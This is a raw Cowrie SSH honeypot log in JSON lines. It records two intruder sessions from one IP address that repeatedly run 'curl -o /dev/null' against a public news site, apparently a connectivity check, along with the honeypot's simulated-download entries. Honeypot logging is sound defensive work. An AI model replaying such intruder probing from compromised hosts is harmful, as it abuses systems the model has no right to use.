{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.528369Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.536152Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.536749Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.546273Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.549823Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.556238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.562846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.563569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.573780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.574473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.581051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.591215Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.595638Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.602227Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.602869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.609532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.610716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.615531Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.639598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.640343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.644784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.645368Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.677065Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.677775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.679775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.680428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.714317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.715054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.717293Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.718002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.758277Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.759249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.762955Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.763685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.798155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.799015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.802750Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.803907Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.839756Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.840465Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.843334Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.845942Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.884832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.885623Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.888813Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.889375Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.909414Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.918889Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.923654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.924288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.927541Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.928589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.942815Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.959932Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.960731Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.965278Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.965999Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.996405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.997110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.008644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.010096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.011321Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.031867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.032636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.048933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.050262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.050931Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.053448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.058223Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.066421Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.068292Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.069136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.091793Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.092935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.093724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.104749Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.105630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.136118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.139445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.140187Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.143553Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.146241Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.146995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.150540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.152620Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.155297Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.157779Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.163807Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.166273Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.176224Z","src_ip":"212.227.125.160","session":"7541ed730449"}
